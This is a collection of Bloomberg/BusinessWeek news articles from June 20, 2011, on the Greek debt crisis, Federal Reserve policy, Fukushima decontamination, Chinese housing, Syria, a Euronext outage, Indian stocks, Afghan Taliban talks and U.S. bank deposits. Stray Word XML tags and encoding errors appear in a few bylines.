U.S.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Italy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10-year bonds slid, driving the yield up 40 basis points. The extra yield, or spread, investors demand to hold the securities instead of benchmark German bunds increased 44 basis points to 1,442 basis points. Default swaps on Greece jumped 40 basis points to 1,967. The Portuguese- bund spread widened 17 basis points. The Spanish-German spread rose eight basis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Italian-German spread widened seven basis points after Moody's put Italy's Aa2 rating on review for a downgrade June 17, citing economic growth challenges, risks associated with efforts to reduce debt and the potential for higher borrowing costs. Default swaps on Italian government debt climbed 12 basis points to 182.5, according to CMA.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yield on the bund fell four basis points, while the 10- year U.S. Treasury yield slipped three basis points. The Markit iTraxx SovX Western Europe Index of credit-default swaps climbed five basis points to 227.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Turkey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Emerging Markets Index slid 0.6 percent, falling for a fourth day. The Bombay Stock Exchange Sensitive Index sank 1.8 percent after a report that the government sought to tax gains on investments routed through Mauritius. Turkey's ISE National 100 Index lost 1.9 percent after regulators increased provisions that lenders must make against some consumer loans. Russia's Micex Index slipped 0.9 percent on lower oil.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GSCI index of 24 commodities down 0.9 percent, the fourth decline and the longest selloff since May 6, as crude dropped $1.23 to $91.78 a barrel, reducing this year's gain to 0.4 percent. Copper fell 1.3 percent. Wheat declined 0.6 percent, the fifth consecutive decline and the longest losing streak since March 11. Natural gas lost 0.6 percent, its sixth straight loss.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Claudia Carpenter, Will Hadfield, Michael Shanahan and Dan Tilles in London. Editors: Stephen Kirkland, Justin Carrigan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&lt;Equity&gt; CN &lt;Equity&gt; CN &lt;Equity&gt; CN &lt;Equity&gt; CN &lt;Equity&gt; CN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Stephen Kirkland in London at skirkland@bloomberg.net.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Sillitoe at psillitoe@bloomberg.net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Indian Stock Market U.S. Stock Market Oil and Gas Stock Research Turkey's Financial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http://www.businessweek.com/news/2011-06-20/stocks-euro-drop-on-greek-aid-delay-oil-approaches-bear-market.html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Professor Bernanke's Paralysis Warning Meets Fed Facing Same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5:27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Banks Have Record $1.45 Trillion to Buy Bonds on Savings Greek Default Spells Б─≤HavocБ─(tm) for Banks a Year After Bailout U.S. 2-Year Notes Rise a 10th Week as Greece Spurs Refuge Demand BofAБ─(tm)s Moynihan Says Capital Rules May Discourage Lending IMF Cuts U.S. Growth Forecast, Sees European Contagion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 Miller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U.S. Treasury yield in seventh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As a Princeton University professor, Ben Bernanke castigated the Bank of Japan in 2000 for a "case of self-induced paralysis" that led to a decade of stagnation. Now, the Federal Reserve chairman may be allowing the U.S. central bank to fall into the same trap after its second round of quantitative easing ends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all but ruling out another cycle of bond purchases, Fed officials have left themselves with little in the way of policy options to respond to slowing growth and rising unemployment. This raises the risk that the U.S. will remain saddled with what Bernanke himself has called a "frustratingly" sluggish recovery that leaves millions of Americans out of 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worry that QE3 will be hostage to QE2," said Vincent Reinhart, a former director of the Fed's monetary-affairs division who is now a scholar at the American Enterprise Institute in Washington. "That may lead to that self- induced paralysis" in further easing policy to aid the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 officials, who begin a two-day meeting tomorrow to plot monetary strategy, are betting the slowdown will prove short- lived and growth will pick up from July through December as shocks from Japan's earthquake and an oil-price surge fade.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GDP Outlook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Private economists agree. After growing at a 2.3 percent annual pace this quarter, the world's largest economy will expand at a 3.2 percent rate in the second half of the year, according to the median forecast of 67 economists surveyed by Bloomberg News from June 1 to June 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Economist Allen Sinai, who sees growth strengthening to between 2.5 percent and 3 percent in the second half and 3 percent in 2012, called the recent stock-market swoon a "consolidation" and forecast that the Standard and Poor's 500 Index of stocks will rise as high as 1,450 by the end of the year. It was at 1,271.50 on June 17.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of Decision Economics in New York also said the "new trading range" for the yield on the 10-year Treasury note is 2.75 percent to 3.375 percent as the Fed responds to the recent economic slowdown by putting off any move to tighten credit until next year. The yield was 2.91 percent as of 9:54 a.m. in London, according to Bloomberg Bond Trader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is that, once again, forecasts for an improved economy prove too optimistic. Economists polled by Bloomberg began 2011 looking for 3.1 percent expansion this year; they now predict a 2.5 percent rate. Fed policy makers are likely to follow suit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batch of data is disappointing, and it is causing us to rethink our outlook for growth for the remainder of the year," Jeffrey Lacker, president of the Federal Reserve Bank of Richmond, told reporters on June 13.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Shaved Forecast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bankers may cut their estimate for this year to 2.75 percent from the 3.1 percent to 3.3 percent they foresaw in April, said Laurence Meyer, a former Fed governor who is now vice chairman of St. Louis-based Macroeconomic Advisers.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probably also will shave their forecast for 2012, by a couple of tenths of a percentage point, he added. In April, the bulk of policy makers saw growth of 3.5 percent to 4.2 percent next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odds have doubled in the last few months to 10 percent that the U.S. will suffer a growth recession - with gross domestic product rising at an annual pace of about 1 percent for two or more quarters while other economic indicators remain soft, Sinai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 were at the Fed, I'd be looking at ways to do something like QE3," he added.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 officials don't seem so inclined.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done enough," Federal Reserve Bank of Dallas President Richard Fisher said in a June 13 speech.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Dangers of Deflation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successes and failures of QE2 have diminished chances of QE3. When Bernanke first raised the possibility of a second round of stimulus last August, he stressed the central bank's determination to avoid deflation: an across-the-board fall in consumer prices and wages that would drive the economy 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concerns have since dissipated as surging oil and food prices have driven up inflation and inflation expectations, said Roberto Perli, a former Fed economist who is now a managing director at International Strategy &amp; Investment Group in Washington.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prices rose at a rate of 3.6 percent in May from a year earlier, compared with a 1.1 percent advance in November, when the central bank began its purchases of $600 billion worth of Treasury securities.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Further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bond buys have had less of a discernible impact on GDP, raising questions inside the Fed about the efficacy of further action, Sinai said. While the purchases did lift stock prices and household wealth, consumer spending has lagged behind, dragging the growth of the overall economy down to 1.8 percent in the first quarter from 3.1 percent in the final three months of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political opposition to QE2 - Congressional Republicans have attacked it as an inflationary policy - also weighs against the launch of QE3, especially at a time when fiscal policy makers are squabbling over the budget and debt ceiling.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some political constraints that inhibit their willingness to do more," said Michael Feroli, chief U.S. economist for JPMorgan Chase &amp; Co. in New York and a former member of the Fed's economic forecasting team.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voicing frustration with the slow pace of the recovery, Bernanke gave no hint he's ready to do anything about it in a June 7 speech in Atlanta. Instead, he spoke of the limits on the Fed, declaring that "monetary policy cannot be a panacea" for all the economy's ills.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Real-Estate Bubble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paper Bernanke wrote while at Princeton in 2000, he took Bank of Japan officials to task for saying they had done all they could to help an economy that had grown about 1 percent a year in the previous decade after the country's real-estate bubble burst.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agreeing Japan faced structural problems that monetary policy couldn't solve, including a broken banking system, Bernanke argued the central bank could do more to pump up demand beyond cutting short-term interest rates to zero.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steps he discussed were "nonstandard open-market operations," including the purchase of Japanese government bonds - just the sort of strategy the U.S. pursued under QE2.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 has been a lot more proactive than the Bank of Japan was back then," said Alan Blinder, a former central bank vice chairman who is now a professor at Princeton University in New Jersey.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‘Too Passive'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Fed "is a little too passive" now for Blinder's tastes. He wants it to cut to zero from 0.25 percentage point the interest rate it pays banks on the excess reserves it holds for them. To encourage the banks to deploy that money elsewhere, the Fed could go even further and effectively charge them for holding the reserves through a negative interest rate, said Blinder, a former colleague of Bernanke's at Princeton, who acknowledged such a radical step isn't likely.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that the Fed has any options left that it's at all likely to use," Blinder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Bernanke instead may suggest at his June 22 press conference that he will keep short-term interest rates low for longer, according to Perli.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becoming increasingly likely that the Fed will be on hold until 2013,"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 cut its target for the federal funds rate - which banks charge each other for overnight money - to between zero and 0.25 percent in December 2008 and then followed in March 2009 with a declaration that rates were likely to remain "exceptionally low" for an "extended period."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 Balance Sheet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Feroli, who doesn't expect the Fed will raise rates until 2013, said the central bank may decide to make the same sort of statement about the size of its balance sheet if the economy fails to pick up in the next few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option, according to Feroli: The central bank could commit to maintaining an enlarged balance sheet for an extended period, thus reassuring investors it won't be quick to reduce its holdings of securities such as Treasuries.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delayed tightening of policy is effectively a form of easing because it acts to restrain long-term interest rates on everything from home mortgages to corporate bonds, Meyer said. The impact, though, is smaller and less persistent than actual easing through additional bond purchases or a reduction in the funds rate, he added.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Bernanke defended the Fed's performance at a press conference following the central bank's last meeting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‘Extraordinary Things'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done extraordinary things in order to try to help this economy recover," he said, pointing to the near-zero fed funds rate and two rounds of securities purchases.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is on firmer ground than it was last year when the Fed started discussing QE2, according to Neal Soss and his fellow economists at Credit Suisse Holdings USA Inc.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extra year of economic growth, profits, retained earnings and cash holdings has added a layer of insulation for the corporate sector," they wrote in a June 10 note to clients. Soss, the bank's chief economist in New York, served as an aide to former Fed Chairman Paul Volcker.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rise in core inflation may have convinced Bernanke to hold off on QE3 for now, said Joseph Gagnon, a former Fed official who is now a senior fellow at the Peterson Institute for International Economics in Washington. Excluding food and energy costs, consumer prices increased at a rate of 1.5 percent in May from a year earlier, up from 0.6 percent in October.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‘Transitory' Increase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increase proves "transitory" - as Bernanke has suggested - then the central bank should push ahead with more bond purchases, Gagnon said, adding that "the unemployment rate is just way too high." Joblessness was 9.1 percent in May, compared with a 5 percent rate in December 2007 when the last recession began.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Bernanke says the "little blip in inflation is temporary and it's going to go back below target, and he says he's very unhappy with the unemployment rate, then why isn't he doing more?" Gagnon asked. "It's really ironic. It's a self- induced paralysis."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Vivien Lou Chen in San Francisco, Steve Matthews in Atlanta and Scott Hamilton in London. Editors: Melinda Grenier, Daniel Moss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Richard Miller in Washington at rmiller28@bloomberg.net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 Wellisz at cwellisz@bloomberg.net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Virtual Events Exchange-Traded Fund Federal Reserve India Business Options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http://www.businessweek.com/news/2011-06-20/professor-bernanke-s-paralysis-warning-meets-fed-facing-same.html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Tepco Says Decontamination Halt Won't Delay Atomic Solution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5:21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Fukushima Failures Kept Behind Closed Doors at IAEA Meeting Ma Picks Wu for Running Mate as Taiwan Opponents Add Support Tepco Halts Water Decontamination as Cesium Absorption Limited Failure Guru Probes Nuclear Crisis for Lessons Not Culprits QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata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Monami Yui and Tsuyoshi Inajima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Tokyo Electric Power Co. played down concern that a solution to the crisis at its Fukushima nuclear plant may be delayed, saying it plans to resume clearing radioactive water that's hindering recovery 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Decontamination of the water was halted on June 18 after radiation levels in a treatment unit exceeded the limit set by the utility in five hours, instead of one month as expected. The company plans to resume full operation of the system after assessing the cause of the readings, Junichi Matsumoto, a general manager, said today in Tokyo.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"Decontamination is the key to solving the problems at the plant," Tadashi Narabayashi, a nuclear engineering professor at Hokkaido University, said yesterday. "They put together equipment from different manufacturers, which may have made the system as a whole vulnerable."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Filtering of about 105 million liters (28 million gallons) of water in basements and trenches at the Fukushima Dai-Ichi plant was halted after the level of cesium in a unit reached 4.7 millisieverts of radiation. Filters generally need replacement at a level of 4 millisieverts, and the company had expected the unit to last about a month, Matsumoto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Electric hasn't determined when it will restart decontamination, Matsumoto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known as Tepco is using a cesium absorption unit from Kurion Inc. of the U.S. After the water passes through that unit it goes to a decontamination facility supplied by Areva SA of France.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should have had a very simple water decontamination system of its own," Narabayashi said. "Then, it's easy to fix or replace a troubled part by themselves."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on April 17 outlined plans to end within six to nine months the world's worst nuclear crisis since Chernobyl in 1986. The first stage is to reduce radiation levels at the plant within three months and then achieve a so-called cold shutdown where reactor temperatures fall below 100 degrees Celsius (212 degrees Fahrenheit).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Fukushima plant had three reactor meltdowns after the March 11 earthquake and tsunami knocked out power and backup generators, crippling its cooling systems. Japan in April raised the severity rating of the crisis to 7, the highest on an international scale and the same as the Chernobyl disaster.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 Response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has been criticized for its slow response to the accident and for publishing erroneous radiation data, while the government-run Nuclear and Industrial Safety Agency has been blamed for not ensuring the utility heeded warnings that a tsunami could overwhelm the plant's defenses.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utility is now the subject of study by Yotaro Hatamura, who was appointed by Prime Minister Naoto Kan last month to head a 10-member team conducting an "impartial and multifaceted" investigation into what went wrong and how to prevent a repeat.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largest banks and insurers, including Sumitomo Mitsui Financial Group Inc. and Dai-ichi Life Insurance Co., will provide short- term operating funds to Tokyo Electric, according to local media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government is discussing plans for a fund of several hundred billion yen to finance reconstruction and support families and companies in the disaster-hit prefectures of Fukushima, Miyagi and Iwate, the Nikkei newspaper reported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Fukushima Governor Yuhei Sato reiterated his opposition to restarting Tepco's nuclear reactors in the prefecture, the Asahi newspaper reported yesterday. Sato said he will respect and adhere to the denuclearization outline of a prefectural committee on reconstruction, the newspaper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‘Gap'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Minister Banri Kaieda said on June 18 that he may let utilities restart nuclear generators that had been shut for routine maintenance. There are negatives to suspending all nuclear power, Kaieda said, citing an expected "gap" in power supply and demand in Japan's coming summer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 indicated his team will probe whether an earthquake-prone country such as Japan should build its energy policy around nuclear plants. Because of the inherent dangers, it's a mistake to treat the industry as safe,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shares rose 4 percent to close at 314 yen on the Tokyo Stock Exchange today. The stock has fallen 85 percent since the day before the quake.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--With assistance from Chisaki Watanabe, Shunichi Ozasa, Stuart Biggs, Katsuyo Kuwako, Kanoko Matsuyama, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>萩原ゆき</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, Taku Kato and Yuriy Humber in Tokyo. Editors: Aaron Sheldrick, Amit Prakash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Monami Yui in Tokyo at myui1@bloomberg.net; Tsuyoshi Inajima in Tokyo at tinajima@bloomberg.net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Langan at plangan@bloomberg.net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Integrated Business Solutions Virtualization Solutions Nuclear Energy Japan's Economy Product Lifecycle Management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http://www.businessweek.com/news/2011-06-20/tepco-says-decontamination-halt-won-t-delay-atomic-solution.html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Existing Housing Market Cools in May Amid Measures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5:30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Auchan-Backed Sun Art Said to Test Demand for $1 Billion IPO Hong Kong Home Prices to Fall Up to 15%, Walter Kwok Says China Stocks Drop to Nine-Month Low on Inflation, Growth Concern Buffett-Backed BYD to Raise $219 Million in China Share Sale Beijing May New Home Prices Rise 2.1% From Year Ago, Agency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closing property index level in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China's effort to cool home prices is damping the market for existing homes, with prices in May falling from the previous month in 23 of 70 cities measured.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more than the 16 cities that posted declines in April, data from the National Bureau of Statistics posted to its website June 18 showed. Existing home prices in Beijing fell 0.2 percent from April while those in Shanghai increased 0.2 percent. The price of new homes, typically sold by developers, rose last month in 67 of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in China and Hong Kong are stepping up property curbs amid concerns prices are becoming unaffordable. China on June 14 ordered banks to hold more money as reserves for the sixth time in 2011 as it fights to contain inflation.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measures work better in the existing home market because the strict home purchase restrictions effectively restrain some purchasing power," Jeffrey Gao, a Shanghai-based analyst at Royal Bank of Scotland Plc, said in a phone interview. "Developers on the other hand are not in a rush to cut home prices as they watch the direction of government policies."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measure of property stocks on the Shanghai Composite Index rose 0.3 percent at the 3 p.m. close of trading, posting the only gain among the five industry groups on the benchmark gauge.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slowing home price growth in the market for existing homes may force more property agencies out of business, said Gao. Midland Realty Ltd. said it will close all of its branches that broker existing homes sales and rentals in Shanghai, because it "isn't optimistic" about the market in the city, China Business News said on May 9, citing Ding Wei, a company official.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Slower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 increases for new homes slowed last month in big cities such as the capital of Beijing, the statistics bureau said. Efforts to rein in property prices have been focused on the nation's largest urban areas. A total of 29 cities posted increases exceeding 5 percent, down from 33 cities in April, according to the bureau's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New-home prices in Beijing rose 2.1 percent in May from a year earlier, while those in Shanghai climbed 1.4 percent, the statistics bureau said. The biggest gains last month were in smaller cities including Urumqi, Mudanjiang, Lanzhou and Qinhuangdao, which all posted increases of at least 7.7 percent, according to the data. Prices in northeastern China's Dandong rose 9.7 percent in May, the most among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with the previous month, new home prices fell in nine cities in May, the same number as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may cut home prices in the second half of the year after facing a drain on cash flow, Gao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Outlook Cut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developers' outlook was cut to "negative" from "stable" by Standard &amp; Poor's on June 15 on concern tighter credit and further government curbs may lead to rating downgrades in the next year. Property sales may start to slow as the government's policy "starts to bite," leading to price cuts that may drive home prices 10 percent lower in the next 12 months, the credit rating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developers such as China Vanke Co. and China Overseas Land &amp; Investment Ltd. started to cut prices in some Chinese cities, and more may follow suit in the second half of this year, according to Credit Suisse Group AG.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are still watching to see how strict the government's property measures will be before cutting prices," said Shen Jian-guang, a Hong Kong- based economist at Mizuho Securities Asia Ltd., in a phone interview. "The slowdown of existing home prices is showing the government's home purchase restrictions are having some effect."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Kong's home prices are "quite frightening" as growing wealth in China fuels increases of 2 percent a month, the city's Chief Executive Donald Tsang said in an interview in Melbourne on June 17. Savills Plc ranks Hong Kong as the world's most expensive place to buy an apartment.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--Bonnie Cao. Editors: Malcolm Scott,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Bonnie Cao in Shanghai at bcao4@bloomberg.net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Housing Market China's Media Market Intelligence Emerging Markets China Real Estate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http://www.businessweek.com/news/2011-06-20/china-existing-housing-market-cools-in-may-amid-measures.html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Syria President Says Nation Faces Conspiracy Designed Abroad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5:54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NATO Probing Libyan Claims of Civilian Deaths in Tripoli Yemeni Clerics Seek SalehБ─(tm)s Removal, Elections in 60 Days QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syria Regime Sends Army Into Northern Town as Residents Flee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Inal Ersan and Glen Carey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Assad's comments from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Syrian President Bashar al-Assad blamed the ongoing unrest in the country on a foreign conspiracy and accused the opposition of using the protests to cause sectarian divide.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conspiracy was designed abroad and perpetrated within our country," Assad said today in speech carried live on state television from Damascus, the capital. The protests were marked by "vandalism, murder and the destruction of private property,"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Assad's 11-year rule began in mid-March as part of a wave of unrest across the Middle East and North Africa this year that has unseated the leaders of Egypt and Tunisia. Yemeni President Ali Abdullah Saleh is in Saudi Arabia for medical treatment for injuries sustained during an attack that followed months of anti-government rallies.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total of 1,289 civilians and 332 members of the security forces have been killed in Syria since Assad's regime cracked down on dissent, the Syrian Observatory for Human Rights said June 12. Demonstrations were held June 17 in Damascus, Hama, Daraa, Al Qamishli and Al Bukamal, Al Jazeera television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Foreign Minister Sergei Lavrov urged the Syrian opposition today to commit to negotiations with Assad and avoid "provocations" that may destabilize the country, according to comments televised on Russian state channel Rossiya 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Refugees in Turkey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Syrians have been crossing the border into Turkey since June 8 to escape the violence. The number of refugees in the southern Turkish province of Hatay rose to 10,553, the Hurriyet newspaper reported today, citing a statement from Ejder Kaya, head of Turkey's Disasters and Emergency Management Directorate.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forces were deployed around Ma'arrat an Nu'man on June 17 after the army swept through the northern town of Jisr al-Shughour earlier this month. The deployment was "to prevent terrorists" from cutting off the highway that links Damascus to Syria's second-largest city, Aleppo, state television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Obama administration is considering additional economic sanctions on Syria involving oil and gas, U.S. officials said on June 17. The U.S. is also examining whether there are grounds for seeking war-crimes charges stemming from the Syrian government's crackdown on civilians.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day earlier, United Nations Secretary-General Ban Ki-moon told reporters in Brasilia that Assad should "stop killing people" in protests in his country and called the attacks "totally unacceptable."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Henry Meyer in Moscow, Lina Ibrahim in Damascus. Editors: Jennifer M. Freedman, Heather Langan, Andrew J. Barden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Glen Carey in Riyadh at gcarey8@bloomberg.net; Inal Ersan in Dubai at iersan@bloomberg.net.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Andrew J. Barden at barden@bloomberg.net; Shaji Mathew at shajimathew@bloomberg.net.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Industrial Design Future of BRIC Nations Design Management Design Research Latin American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http://www.businessweek.com/news/2011-06-20/syria-president-says-nation-faces-conspiracy-designed-abroad.html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Euronext Stock Open Delayed Hour by Computer Malfunction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5:32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European Stocks Decline as EU Fails to Agree on Greece Loan Euronext Market Opening May Be Delayed on Technical Problems Greek Default Spells Б─≤HavocБ─(tm) for Banks a Year After Bailout European Stocks Decline for Seventh Week; Celesio Shares Tumble European Stocks Climb; Greek Banks Rise as Carrefour Shares Slip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Adria Cimino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to add trader comment, exchange background starting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open of equities trading was delayed for an hour on bourses operated by NYSE Euronext in Paris, Amsterdam, Brussels, Luxembourg and Lisbon because of an unspecified computer malfunction, the exchange operator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breakdown was fixed and trading started at 10 a.m. Paris time. Equities fell at least 0.9 percent on the venues as governments failed to agree on a payment to spare Greece from default. The Stoxx Europe 600 Index lost 0.9 percent to 264.78 as of 10:46 a.m. in Paris, data compiled by Bloomberg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has been interrupted repeatedly by systems issues this year in Europe, where stock transactions are divided among regulated exchanges and alternative platforms operated by companies such as Chi-X Europe. London Stock Exchange Group Plc experienced a four-hour halt on Feb. 25 after bringing a new network online 11 days earlier.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the first time, but we have to deal with it," said Yves Marcais, a sales trader at Global Equities in Paris. "It would have been worse if it happened in the middle of the trading session. At least the market wasn't open and we knew about the delay ahead of time."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Improving computer systems is a goal of NYSE Euronext's combination with Deutsche Boerse AG, disclosed in February. The companies announced the $9.5 billion merger one day after LSE agreed to a deal with the operator of Toronto's main exchange, TMX Group Inc.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Shareholder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Deutsche Boerse needs 75 percent of shareholders to approve its purchase of NYSE Euronext by July 13. The takeover would create the world's largest exchange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NYSE Euronext was formed when the operator of the New York Stock Exchange bought Europe's second-largest exchange in 2007. It owns exchanges in Amsterdam, Lisbon, Paris and Brussels, as well as London-based Liffe, Europe's second-largest derivatives market. The company also runs three U.S. stock exchanges: NYSE Arca, NYSE Amex and the New York Stock Exchange, two options platforms and the NYSE Liffe U.S. futures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technical issue is resolved," said Caroline Tourrier, a spokeswoman for Euronext in Paris. "Now we're working to identify the nature of the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Adam Haigh in London and David Whitehouse in Paris. Editor: Chris Nagi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Adria Cimino in Paris at acimino1@bloomberg.net.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Andrew Rummer at arummer@bloomberg.net.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How Sweden Steered Clear of the Greece Fiasco Apple Raises the Stakes in Patent Battle With Samsung MBA Pay: The $3.6 Million Degree God's MBAs: Why Mormon Missions Produce Leaders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Silicon Valley: Housing Bust? What Housing Bust? The Supercycle: A Longer Range View of Emerging Markets How Sweden Steered Clear of the Greece Fiasco Microsoft Is Pinning Its Hopes on Windows Phone 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God's MBAs: Why Mormon Missions Produce Leaders Chewing Over Herman Cain's Pizza Past Bitcoins: Currency of the Geeks The Big Business of Synthetic Highs Charlie Rose Talks to Glenn Hutchins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Buying Stocks Indian Stock Market Stock Investing Stock Research U.S. Stock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13:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/euronext-stock-open-delayed-hour-by-computer-malfunction.html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Indian Equities Decline Amid Mauritius Tax Treaty Speculation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1:45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GTL Ltd. FoundersБ─(tm) Pledged Shares Not Sold, Official Says Emerging Stocks Fall to 3-Month Low on Greece, Technology Tumble IndiaБ─(tm)s Sensex Retreats for Second Week on Greece, Interest Rate China Stocks Fall, Capping Second Weekly Loss, on Policy Concern India Signals Slower Pace of Rate Increases on Global Risks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Rajhkumar K Shaaw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India's benchmark stock index plunged to a four-month low after a report the government sought to tax capital gains on investments routed through Mauritius sparked a selloff.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Reliance Infrastructure Ltd. and Reliance Communications Ltd. plunged more than 6 percent each after they were removed from the benchmark index. Tata Consultancy Services Ltd. fell for a fourth day after the Financial Express said June 18 the nation's largest software services provider has been ordered to pay 6.56 billion rupees in back taxes after tax authorities disallowed some of its claims. Reliance Industries Ltd., India's most valuable company, lost 2.1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Bombay Stock Exchange Sensitive Index, or Sensex, dropped 278.45 points, or 1.6 percent, to 17,592.08, at 10:40 a.m. in Mumbai. The S&amp;P CNX Nifty Index on the National Stock Exchange lost 1.5 percent to 5,286.80. The BSE 200 Index decreased 1.6 percent to 2,189.59.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Mauritius tax issue has evoked this sell-off," said Deven Choksey, managing director at Mumbai-based K.R. Choksey Shares &amp; Securities Pvt., which has $125 million in assets. "Most companies have been that been attracting money through Mauritius route. If this case is reversed, then it will be a double whammy. One is the taxation aspect. The second is that, money will get pulled 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will seek to tax capital gains on investments made through Mauritius as negotiations on its taxation treaty with the island nation resume after three years, Business Standard reported yesterday. India wants to impose a tax because the capital gains are being made in India, the report said, citing Prakash Chandra, chairman of the tax board. At present, such a taxation authority resides with Mauritius, which doesn't impose capital gains tax, it cited Chandra as saying.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Overseas investors sold a net 4.23 billion rupees ($94.3 million) of Indian stocks on June 16, taking total withdrawals from equities this year to 8.04 billion rupees, according to data on the website of the Securities and Exchange Board of India.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Santanu Chakraborty in Mumbai. Editor: Ravil Shirodkar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Rajhkumar K Shaaw in Mumbai at rshaaw@bloomberg.net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Darren Boey at dboey@bloomberg.net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Equity Research Business Taxes Indian Economy Indian Stock Market Oil Speculation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09:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/indian-equities-decline-amid-mauritius-tax-treaty-speculation.html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Confirms Afghan Taliban Talks as Karzai Criticizes Motives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12:16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NATO Probing Libyan Claims of Civilian Deaths in Tripoli Taliban-U.S. Talks Б─≤Very Preliminary,Б─(tm) Defense Chief Says Obama, Boehner Join Forces to Negotiate Fairways, Not Budget Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas Lugar Gives Obama Б─≤at BestБ─(tm) Mediocre Grade for Foreign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Rupert and Eltaf Najafizada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U.S. has made "very preliminary" contacts with Afghan Taliban guerrillas, Defense Secretary Robert Gates said, after Afghanistan's president said he is looking to Pakistan to mediate peace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Hamid Karzai's speech, and a reaction yesterday from U.S. Ambassador Karl Eikenberry, illustrated again recent tensions between the U.S. and the Afghan leader whose government it is supporting.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Karzai criticized the U.S. as an occupying force pursuing its own interests, Eikenberry told students in the western city of Herat that "hurtful and inappropriate" comments by "some of your leaders" undermine support in the U.S. for its aid and military role in Afghanistan.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Karzai's speech shows that he "has lost hope over America's ability to either defeat the Taliban or bring them to some kind of agreement," said Waheed Mujda, a political analyst at the Kabul Center for Strategic Studies, an independent think tank in Kabul.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U.S. congressional leaders such as Senator Richard Lugar, the top Republican on the Senate Foreign Relations Committee, pressing President Barack Obama to withdraw a substantial number of troops next month at the start of a promised drawdown, "Karzai is seriously concerned that the U.S. is pulling out of the conflict and so he is leaning toward working with Pakistan instead on peace negotiations," Mujda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has vowed to end the U.S. combat role in Afghanistan by 2014, handing over security duties to Afghan forces that the U.S. is training and equipping.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Their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who has praised and criticized the international military force in Afghanistan, told a youth conference in Kabul June 18 that the U.S.-led troops "are here for their own national interests." Repeating his criticism of U.S. military tactics that have caused civilian casualties, he said foreign troops "put our lives under their feet and dishonor the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U.S. officials often decline to comment on Karzai's criticisms of the American presence, Eikenberry responded, without naming Karzai.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Americans who are serving in your country at great cost in terms of our lives and treasures, hear themselves compared with occupiers, told that they are only here to advance their own narrow interests and likened to the brutal enemies of the Afghan people, my people in turn are filled with confusion and they grow weary of our effort here," Eikenberry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Military Pressure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State Department officials and envoys from other countries have met Taliban representatives in recent weeks, "real reconciliation talks are not likely to be able to make any substantive headway until at least this winter," Gates said on CNN's "State of the Union" program. "I think that the Taliban have to feel themselves under military pressure, and begin to believe that they can't win before they're willing to have a serious conversation,"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all said all along that a political outcome is the way most of these war's end," Gates said on the CNN program, broadcast yesterday. "The question is when and if they're ready to talk seriously about meeting the redlines that President Karzai, and that the coalition have laid down, including totally disavowing al-Qaeda."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Importance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disclosing the U.S.-Taliban talks, Karzai said his government isn't involved. While he described the U.S. initiative as positive, he cited neighboring Pakistan as the key interlocutor with the guerrillas. "Getting Pakistan's help in peace talks is very important for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military has backed the Afghan Taliban as a proxy force, according to analysts such as Pakistani author Ahmed Rashid and U.S. officials such as Admiral Mike Mullen, chairman of the Joint Chiefs of Staff. Karzai has criticized Pakistan's role in Afghanistan, saying it supports the Taliban in an effort to dominate his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Mujda and other analysts say it is unclear what political concessions from Afghanistan the Pakistani military might demand in exchange for pushing the Taliban into a peace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Karzai visited Pakistan for talks with its leaders. He and Pakistani Prime Minister Yusuf Raze Giyani joined the first meeting of an Afghan-Pakistani commission that will help work for reconciliation. Giyani said then that Pakistan supports a reconciliation process that must be "Afghan-owned and Afghan-led."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Catherine Larkin in Washington.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James Rupert in New Delhi at jrupert3@bloomberg.net. Eltaf Najafizada at enajafizada1@bloomberg.net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 Sales U.S. Competitiveness U.S. Energy Policy U.S. Manufacturing U.S. Stock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http://www.businessweek.com/news/2011-06-20/u-s-confirms-afghan-taliban-talks-as-karzai-criticizes-motives.html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Banks Have Record $1.45 Trillion to Buy Bonds on Savings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12:07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PNC Said to Pay $3.45 Billion for RBC U.S. Retail Banking Unit Greek Default Spells Б─≤HavocБ─(tm) for Banks a Year After Bailout U.S. 2-Year Notes Rise a 10th Week as Greece Spurs Refuge Demand Hunt for Б─≤Holy GrailБ─(tm) Pits ECB Against Naked Banks: Euro Credit JapanБ─(tm)s Five-Year Notes Gain on Greece, U.S. Slowdown Concerns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Masaki Kondo, Yoshiaki Nohara and Saburo Funabiki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today's bond yields in 10th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Japan's biggest bond investors see increasing parallels between the nation's government debt market and Treasuries, indicating that historically low yields in the U.S. have room to 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as in Japan, deposits at U.S. banks exceed loans, reaching a record $1.45 trillion last month, Federal Reserve data show. As recently as 2008, there were more loans than deposits. The gap is also at an all-time high in Japan, where banks use the money to buy bonds, helping keep yields the lowest in the world even though the country has more debt outstanding than America and a lower credit rating.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none of the more than 40 economists surveyed by Bloomberg expect the U.S. will see two decades of stagnation like Japan, they are paring growth estimates as unemployment remains above 9 percent and the housing market struggles to recover. The International Monetary Fund cut its forecast for U.S. growth in 2011 for the second time in two months on June 17, bolstering the appeal of fixed-income assets.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"I've seen what happened in Japan, so when looking at the U.S. now, I think, ‘Ah, the same thing is going on,'" said Akira Takei, the Tokyo- based general manager of the international fixed-income investment department at Mizuho Asset Management Co., which oversees about $41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Savings Increase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decade before credit markets seized up in 2008, U.S. deposits exceeded loans by an average of about $100 billion, Fed data show. The worst recession since the 1930s led consumers to trim household debt to $13.3 trillion from the peak of $13.9 trillion in 2008, and increase savings to 4.9 percent of incomes from 1.7 percent in 